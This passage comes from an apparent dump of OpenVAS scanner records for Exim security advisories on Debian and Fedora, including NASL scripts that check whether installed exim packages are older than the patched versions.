exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"exim4\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.80-7+deb7u5\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:57:47", "description": "The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. 
This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling.", "cvss3": {}, "published": "2017-06-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3888-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703888", "href": "http://plugins.openvas.org/nasl.php?oid=703888", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3888.nasl 6618 2017-07-07 14:17:52Z cfischer $\n# Auto-generated from advisory DSA 3888-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703888);\n script_version(\"$Revision: 6618 $\");\n script_cve_id(\"CVE-2017-1000369\");\n script_name(\"Debian Security Advisory DSA 3888-1 (exim4 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 16:17:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-06-19 00:00:00 +0200 (Mon, 19 Jun 2017)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3888.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"exim4 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Exim (v4) is a mail transport agent. 
exim4 is the metapackage depending\non the essential components for a basic exim4 installation.\");\n script_tag(name: \"solution\", value: \"For the\nfull details, please refer to their advisory published at:\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt \nFor the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name: \"summary\", value: \"The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res 
= isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u1\", 
rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:34:20", "description": "The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling.", "cvss3": {}, "published": "2017-06-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3888-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703888", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703888", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3888.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3888-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703888\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-1000369\");\n script_name(\"Debian Security Advisory DSA 3888-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-19 00:00:00 +0200 (Mon, 19 Jun 2017)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3888.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name:\"summary\", value:\"The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. 
This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-09-01T00:00:00", "type": "openvas", "title": "Fedora Update for exim FEDORA-2017-f5177f3a16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873330", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873330", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_f5177f3a16_exim_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for exim FEDORA-2017-f5177f3a16\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873330\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-01 07:11:20 +0200 (Fri, 01 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for exim FEDORA-2017-f5177f3a16\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"exim on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-f5177f3a16\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NI3SG43RHDCSIG63F3GJFP2DWDBJS36Y\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", 
\"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.89~5.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:54:07", "description": "A local root privilege escalation\nvulnerability was found in Exim, Debian", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3517-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703517", "href": "http://plugins.openvas.org/nasl.php?oid=703517", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3517.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3517-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703517);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-1531\");\n script_name(\"Debian Security Advisory DSA 3517-1 (exim4 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-03-14 00:00:00 +0100 (Mon, 14 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3517.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"exim4 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Exim (v4) is a mail transport agent.\nexim4 is the metapackage depending on the essential components for a basic\nexim4 installation.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution\n(wheezy), this problem has been fixed in version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\nWe 
recommend that you upgrade your exim4 packages.\");\n script_tag(name: \"summary\", value: \"A local root privilege escalation\nvulnerability was found in Exim, Debian's default mail transfer agent, in\nconfigurations using the perl_startup option (Only Exim via\nexim4-daemon-heavy enables Perl support).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) 
!= NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif 
((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "openvas", "title": "Fedora Update for exim FEDORA-2016-0", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807496", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807496", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for exim FEDORA-2016-0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# 